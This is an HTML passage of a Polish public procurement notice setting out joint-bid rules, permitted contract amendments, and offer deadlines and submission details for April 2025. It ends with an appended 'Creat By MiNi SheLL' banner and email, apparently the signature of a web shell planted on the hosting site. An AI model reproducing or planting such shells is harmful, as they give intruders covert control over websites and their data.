WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 5.24. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców:<br/>-oświadczenia, o których mowa w punkcie 9.1 b) i c) SWZ, składa Wykonawca/każdy spośród Wykonawców wspólnie<br/>ubiegających się o zamówienie. Oświadczenia te mają potwierdzać brak podstaw wykluczenia w zakresie, w którym każdy z<br/>Wykonawców wykazuje brak podstaw wykluczenia,<br/>- oświadczenia, o których mowa w punkcie 9.1 b) i c) SWZ, składa Wykonawca/każdy spośród Wykonawców wspólnie<br/>ubiegających się o zamówienie. Oświadczenie te potwierdzają spełnianie warunków udziału w postępowaniu w zakresie, w<br/>którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>5.25. W przypadku gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia, Wykonawcy ustanawiają pełnomocnika<br/>do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia<br/>umowy w sprawie zamówienia publicznego. Wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie<br/>z pełnomocnikiem. Dokument pełnomocnictwa, z treści którego będzie wynikało umocowanie do reprezentowania w<br/>postępowaniu o udzielenie zamówienia tych Wykonawców należy dołączyć do oferty.<br/>5.26. Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może<br/>żądać przed zawarciem umowy w sprawie zamówienia publicznego przekazania kopii umowy regulującej współpracę tych<br/>Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	W przypadku zmian stawek podatku VAT możliwa jest zmiana ceny brutto przy czym ta zmiana może stanowić wyłącznie różnicę pomiędzy dotychczasową a nową wysokością stawki podatkowej a zmiana ta będzie miała miejsce od momentu rozpoczęcia obowiązywania nowej stawki podatku VAT.<br/>2.	Wykonawca zobowiązuje się do niedokonywania zmian cen na zaoferowany przedmiot zamówienia (poza przypadkiem określonym w § 7 ust. 1, 6, 12) przez okres obowiązywania umowy. Zamawiający dopuszcza jednak zmianę postanowień umowy w zakresie ceny w innych przypadkach niż te określone w § 7 ust. 1, 6, 12 pod warunkiem, iż zmiana ta będzie korzystna dla Zamawiającego tj. obniżenie ceny jednostkowej netto przy zachowaniu pozostałych parametrów oferowanego przedmiotu zamówienia bez zmian.<br/>3.	Zamawiający dopuszcza zmianę umowy w zakresie danych identyfikujących Strony Umowy, takich jak np. firma, adres siedziby lub inne zapisy dotyczące wskazania stron.<br/>4.	Zamawiający dopuszcza wydłużenie terminu płatności w przypadku zmiany ustawy z dnia 8 marca 2013 r. o przeciwdziałaniu nadmiernym opóźnieniom w transakcjach handlowych (tj. Dz. U. 2023 poz. 1790). <br/>5.	Wykonawca zobowiązuje się do podpisania aneksu wydłużającego termin, o którym mowa w § 7 ust. 4 Umowy.<br/>6.	Zamawiający dopuszcza również wprowadzenie zmiany wysokości wynagrodzenia należnego Wykonawcy, w przypadku zmiany:<br/>a)	stawki podatku od towarów i usług oraz podatku akcyzowego,<br/>b)	wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę, <br/>c)	zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub ubezpieczenie zdrowotne,<br/>d)	zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych (t.j. Dz. U. 2024 poz. 427),<br/>	jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez wykonawcę. Zmiana taka nie może nastąpić przed upływem 12 miesiąca trwania umowy.<br/>	W celu ewentualnej zmiany wynagrodzenia należnego Wykonawcy, Wykonawca jest zobowiązany w terminie 7 dni roboczych od wystąpienia okoliczności wskazującej na wzrost wynagrodzenia, podać Zamawiającemu pisemne informacje dotyczących szczegółowych kosztów pracy z rozbiciem na pracowników wskazanych w oświadczeniu o zatrudnieniu osób na umowę o pracę, wskazać składki na ubezpieczenie zdrowotne i społeczne, kwoty wynagrodzeń aktualne na dzień zawarcia umowy oraz wskazać procentowo jak powyższe koszty kształtują wartość umowy brutto. W przypadku niezłożenia wymaganych dokumentów Wykonawcy w trakcie realizacji zadania nie będzie przysługiwała możliwość zmiany wynagrodzenia na podstawie § 7 ust. 6 niniejszej umowy.<br/>e)	zmiany ceny materiałów lub kosztów związanych z realizacją zamówienia; poziom zmiany ceny materiałów lub kosztów związanych z realizacją zamówienia uprawniający Strony Umowy do żądania zmiany wynagrodzenia ustala się na 10% w stosunku do poziomu cen tych samych materiałów lub kosztów z dnia składania ofert. Początkowy termin ustalenia zmiany wynagrodzenia ustala się na dzień zaistnienia przesłanki w postaci wzrostu wynagrodzenia ceny materiałów lub kosztów związanych z realizacją zamówienia o 10%,<br/>	jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę. Zmiana taka nie może nastąpić przed upływem 6 miesiąca trwania umowy.<br/>Pozostała część treści zmian umowy jest zawarta w załączniku nr 5 do SWZ - Projektowane Postanowienia Umowy. Jest to spowodowane ograniczoną ilością miejsca (do wpisania) w niniejszej kolumnie. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-04-25 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">10.2. Ofertę należy złożyć na Platformie pod adresem: https://zsm-chorzow.ezamawiajacy.pl/ w zakładce „OFERTY&#34;.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-04-25 09:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-05-24</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com